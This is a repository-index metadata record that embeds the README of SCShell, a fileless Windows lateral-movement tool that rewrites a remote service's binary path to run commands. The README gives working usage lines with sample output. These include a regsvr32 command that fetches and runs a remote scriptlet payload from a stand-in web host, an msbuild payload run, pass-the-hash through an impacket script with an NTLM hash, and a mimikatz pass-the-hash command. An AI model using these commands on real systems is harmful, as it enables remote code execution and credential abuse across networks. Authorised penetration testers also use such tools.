{"id":13839896,"url":"https://github.com/Mr-Un1k0d3r/SCShell","last_synced_at":"2025-07-11T07:31:19.412Z","repository":{"id":44454099,"uuid":"221572133","full_name":"Mr-Un1k0d3r/SCShell","owner":"Mr-Un1k0d3r","description":"Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","archived":false,"fork":false,"pushed_at":"2023-07-10T01:31:54.000Z","size":119,"stargazers_count":1400,"open_issues_count":1,"forks_count":236,"subscribers_count":28,"default_branch":"master","last_synced_at":"2024-11-21T04:51:48.755Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Mr-Un1k0d3r.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2019-11-13T23:39:27.000Z","updated_at":"2024-11-15T21:47:47.000Z","dependencies_parsed_at":"2024-01-29T09:32:32.594Z","dependency_job_id":null,"html_url":"https://github.com/Mr-Un1k0d3r/SCShell","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-Un1k0d3r%2FSCShell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-Un1k0d3r%2FSCShell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-Un1k0d3r%2FSCShell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-Un1k0d3r%2FSCShell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Mr-Un1k0d3r","download_url":"https://codeload.github.com/Mr-Un1k0d3r/SCShell/tar.gz/refs/heads/master","
host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225705053,"owners_count":17511215,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:00:37.658Z","updated_at":"2024-11-21T09:30:33.852Z","avatar_url":"https://github.com/Mr-Un1k0d3r.png","language":"C","readme":"# SCShell\n\nSCShell is a fileless lateral movement tool that relies on ChangeServiceConfigA to run commands. The beauty of this tool is that it does not perform authentication against SMB. Everything is performed over DCERPC.\n\nThe utility can be used remotely WITHOUT registering a service or creating a service. It also doesn't have to drop any file on the remote system* (depending on the technique used to execute).\n\n# How it works\n\nInstead of creating a service, it simply opens a service remotely and modifies the binary path name via the `ChangeServiceConfigA` API.\n\nThen it starts the service.\n\nOnce the execution is completed, the service binary path is reverted to the original one. 
The original service path is extracted using `QueryServiceConfigA`.\n\nEverything happens over DCERPC, including the authentication.\n\n![network](https://raw.githubusercontent.com/Mr-Un1k0d3r/SCShell/master/network.png)\n\n\n\n# Usage\n\nThe current build is written in `C` but I will port it to `C#` and `PowerShell`.\n\n```\nUsage:\nSCShell.exe target service payload domain username password\n```\n\n`target` can be set to `local` to run the payload locally.\n\nRemote execution\n```\nSCShell.exe 192.168.197.131 XblAuthManager \"C:\\windows\\system32\\cmd.exe /c C:\\windows\\system32\\regsvr32.exe /s /n /u /i://your.website/payload.sct scrobj.dll\" . administrator Password\n```\n\nI recommend using `C:\\windows\\system32\\cmd.exe /c` to make sure the payload will not be killed once the service stops. You NEED to use the full path.\n\nYou can also use an msbuild payload\n```\nSCShell.exe 192.168.197.131 XblAuthManager \"C:\\windows\\system32\\cmd.exe /C C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe C:\\payload.csproj\" . administrator Password\nSCShell ***\nTrying to connect to 192.168.197.131\nUsername was provided attempting to call LogonUserA\nSC_HANDLE Manager 0x009ED250\nOpening XblAuthManager\nSC_HANDLE Service 0x009ED1B0\nService path was changed to C:\\windows\\system32\\cmd.exe /C C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe C:\\payload.csproj\nService was started.\n```\n\nI'm using the XblAuthManager as the target which is the Xbox Accessory Management Service\n\n# Passing the Hash\n\nscshell.py is a Python 2 \u0026 3 implementation of SCShell. Using the impacket project, it can easily be used to perform the same lateral movement using pass the hash.\n\nInstallation\n```\npip install impacket\n```\n\nUsage\n```\npython scshell.py DOMAIN/USER@target -hashes 00000000000000000000000000000000:ad9827fcd039eadde017568170abdecce\nImpacket v0.9.20 - Copyright 2019 SecureAuth Corporation\n\n[*] Command need to use FULL path. 
No command output.\nSCShell\u003e\n\n```\n\nYou can use the `C` utility to pass the hash. By default, the current process token will be used. You can set the current process token using a standard pass-the-hash approach.\n\nOn the local system\n```\nsekurlsa::pth /user:user /domain:domain /ntlm:hash /run:cmd.exe\n```\n\nThen run SCShell.exe within the newly created cmd.exe.\n\n# Compiling from source\n\nThe code was compiled on Windows using the GCC MinGW compiler.\n\n# Credit\nMr.Un1k0d3r RingZer0 Team\n\nTazz0 for the moral support\n","funding_links":[],"categories":["C# #","C (286)","C","Pentesting"],"sub_categories":["ARM"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FMr-Un1k0d3r%2FSCShell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FMr-Un1k0d3r%2FSCShell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FMr-Un1k0d3r%2FSCShell/lists"}